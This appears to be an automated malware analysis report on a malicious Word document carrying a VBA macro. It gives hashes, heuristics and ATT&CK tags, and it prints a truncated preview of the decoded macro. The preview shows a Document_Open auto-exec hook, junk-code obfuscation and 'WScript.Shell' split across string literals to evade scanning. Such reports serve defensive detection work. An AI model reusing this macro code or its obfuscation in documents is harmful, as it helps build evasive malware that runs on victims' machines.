Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 49ea70296051e531…

MALICIOUS

Office (OOXML)

243.5 KB Created: 2019-10-30 07:14:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-08-10
MD5: f9271c67656ca2f338cf0b0e11ad18bf SHA-1: 0cee69296440a4dc51a202c7ca4fd39a933c7394 SHA-256: 49ea70296051e531201690131eb0ef55869ceccd4f1134309ec54debfd86ec3b
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an OOXML document containing a VBA macro with a Document_Open auto-execution subroutine. This macro utilizes obfuscation techniques, including reassembling API names from string literals, to call dangerous functions like Shell() and CreateObject(). The reassembled string "wscRIPt.sHell" strongly suggests the execution of a script, likely to download and run a second-stage payload.

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10442 bytes
SHA-256: 528bdd80d6131e5969344286029d6c2f243cde5272222a320c9103657947994c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()

qnde.v__A_r5w_J_m8n_9Qhg8


End Sub




Attribute VB_Name = "qnde"
Sub v__A_r5w_J_m8n_9Qhg8()
If "Qs_C8G8_c_XY_wKVHiLh98kMp__Pge_Yi2RM_8RZgVQDD7" = "pM8EQLS_TR_nW3_gS868zGT7LIFv_cgV_sMuRRCu_bX9" Then
Dim EUaXR9_RHE_Y2A3__g_1ukemeLE_t_1 As String
ElseIf "MsUrzrqS_ZDD3lx3RX_nYWfCczw2_t_h_NsoVG_NNC_QgWk_qRvbmVRyB" = "GE94yMGYe_e3_V_UqPKTEf_Dv_m7X4j63bD__SYzu2_O__g5l_6__U7k_" Then
Dim t_miJAjWhAfH_QM1UhMdo_ocrKP8dzWd As String
Dim c2IKuGa1Q2W__mbphEjwj_SlS_z8jl2rb_nF___ As String
End If
If "D_UCwjhb_rjPOEj4UXf2lPcGnAodA8Lgf_Vp" = "D4f_tguF9Lcc2_Ira_SxcDXw4_b_V_sEr3oZ1d__d" Then
Dim MGRVBk2oc_UphCAVs_p_os6bNt8Rrz7_NIF7_PrRiQ27 As String
ElseIf "NX_po__WP9xcJz_QlZ6m_RRN7_PRNMUN19DziHm" = "mqYlOTllEIPp_TDx5_uslmo__cZlKlGqTwI5ip_3JP__7g" Then
Dim L3l_HtwYA9_Oiu4APc_iKK_HEE_2XKbeBTFf9_SW35vI3I As String
Dim G9JAh_NLArS4_q5AoWVCEdMAD_doPY1O5_u2DK4Wx_ExeFOo84_vV_zllI As String
End If
If "uXdi6az_946_vSb9O_NXT8sxpUR_2xH_F4ZU3EBn7aGUs5_mI" = "WqtMCxwno2Z_t__lwv13___4ja3pN_uMnvU_Wt__mpCLl" Then
Dim dBP_r6_Ft_Qgzmk5_Pj_CT8p_D_tuEP2wH_ As String
ElseIf "Obje_m_4j_Yg_P_fPbEX_Dj_d3MTduXthgLRUtbS" = "ZMldg5Skh9Ogs5_2h_EOlOyeo9Z_r_" Then
Dim fAvRiz7X684s5v_Bxk_YwrL_S_W_ygTO3 As String
Dim WROuPLJ5__FU3T_Vb_x2HMwmq9XSziOcdyWSsQXO1dmm_iYp As String
End If
iTD_CTKwTd7R4OPqn5hAcMDERomoN_mNN4VQ19vfW_RcLlrhNLKV9gUKF8nXqeXRzi_938zn__cT4j3o6_Q_pGOqY__2KNy1i9lliroOVfM7_AQf_8amDWliILZsx7RsBku57F_DN_e_3RmYsdx = 0
If "TjMWfWj_ek_Pwz_Zomz_6jl_kXAmi_g" = "Yr9EK27_ENw_M_bAZC8RrVss8Bu_V6YT_4z_1xDwor" Then
Dim xhvdvc6ACVBDO_8EG__zkHxS_RGW_k8_mAg_7TOG_Ur_ As String
ElseIf "Hyew_lg_py_fsSZSLX1bW_aOUwHwty" = "oEYu_CwSRU_3Tx2_Rc354kdFeGNEQHTtJz_1_8ILf2_UXcglVTTn" Then
Dim x4_kIF3yh___IicoA4SJfO_e_r_ilr7wpzV6_Fwq As String
Dim OW7z7TD4_7UY_SMY2XbaDIBy_KKSCgjt_k4_QBhnc_ As String
End If
If "enLXvLb6_fmLb_K_uk_tqVLkROXE_ozx7_" = "mWceX81Fc__t_xwIP6dsN_Rj_WxMyNoxOTSwdEB_3a3HegFjRwO3JDtd_" Then
Dim Y__dQDNGUnTAn_sSzwE__XGC5_8ud_jxqlp__N_n As String
ElseIf "MBaEQ_E_zN6O6vAs5iOFbmI_eH_ShQalZDrK" = "o8c2skmvmYtzoQ_otXRj2Wi__ubXwJxr" Then
Dim n_7_WWz9WP_XBnFLu1_u_SHNSu7_D9Sk_uAM_iM_bjU_ck4_KB_R As String
Dim v76KuhlkYptW7TVPm2DBd_HW7Bur1zw_8Ax_ynbY6lauz7__D As String
End If
If "dSR8xwunYNhw3sh3rY7eQZ8PnE2YWf9_lcMVU__B_PPP4k_2" = "X_bw_U_Jh5LG2Nd_OV_WoOtb__gV_BAfeYZ3_pJ_Ss" Then
Dim aGq_W_PZmUqTR_PAu2weGU5okSwj_iB__6xbt2me_bYdx As String
ElseIf "Qb_5QCwa_L_W_DoY_IfPVKxE2EHYo5P" = "aLV_2mt7FTsErUiQQ_VKHtj_n3_B5Nv_5_5qrggOXi__ahWWez_lY_hqkOT" Then
Dim kg_2gjJhZ1isU_vijid_Vef_F_izaD_RChn1gGT As String
Dim Nx6nGNFSI9__uNb_A7kVAS_LuGfvR5_SDlqgh2w23Egb__g As String
End If
xqu1oXFAJ_21WE7FPaI1HVCi6F__m_mYO_qhYU_D__QKIe1fh_mBBSURc_4XV_MEURbOWNq4Y_s__1PQOUYgQaM5kO_Mabr9s_z1_a_IOrl_iJMkuc_Ahpx3_fn_ISS7LtR = "ws" & "cR" & "IPt." & "sHell"
If "x_hzie714rj2AqT_M7mw_g4W__sctudDqjrpt" = "RwGuvy79v_YDIdSEXG__rYvS__DU_P8mGHez" Then
Dim fLt_Z_Mh_fb9ua_ZeiM2AwomkaxVBu6 As String
ElseIf "bi_V_ji_DPYfDjiDX_g5lzsg_T8I1VGiZ9H29_X9mpuWE_V1EGmmO_" = "MlzdOkkOJr_y_DRpESigG5_KQA7__irdJUle_UnvNMV_OP_HYX_I_qwQhdB" Then
Dim OndKkAcejavnsovI4Y_6_8ngfgXZcgK7XHN_s_t_u As String
Dim tPpltHdGW32gg_P96o_b___FyEZPnZ1n8_Fh84uN3I As String
End If
If "mRP1_8_vMpYrrMZwerCb7_ChV4r__3ois6PwXNRRfmc" = "XRWKW_Ffop_jDrUCF_tTAz8v7lOFOu6" Then
Dim IYF__VWc4m_3_wohp2EBY3_6hSkNur9F4ty As String
ElseIf "hQqsbyq1769G_hN_iVOOIait_rBm28H7di_ZWS6_R" = "jWl_q_k_KMYuo_r6jtl_88m_mSZwlEZL7CzB_" Then
Dim A__vm5Xr4ArZs_PN_ktjRMiwS_vCwbFexgti__Kqc4YZ_B As String
Dim VN5i_EQWilTDRg_J5QsBl_QpM5O__Wx_sGhXHCV_CP7_ As String
End If
If "EvsmhI9_q1YK6DL_yNPBxKT_9j_q5q8L" = "CIaZBlTxXpQ1qMa_1LBy9uI4Rhn7GHB92C_lmv7C4bn_3c" Then
Dim Sl_7yhe_LRAg_d8VgEcR9dExP_O94W__AxD_yIRdTrzol_nRDW5XdacxV As String
ElseIf "IgtIeEyJxfIO6gMw98FnZBJQ6tVbigXKPde" = "lgJxc_TwYT_HzgkecM_6_LSMu
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 31232 bytes
SHA-256: 83a8911e30c76cc37fccb30ae4071efc0bfa7a64178c6267a4d25733443f9eca

Open this report in the interactive analyzer, or submit your own file for analysis.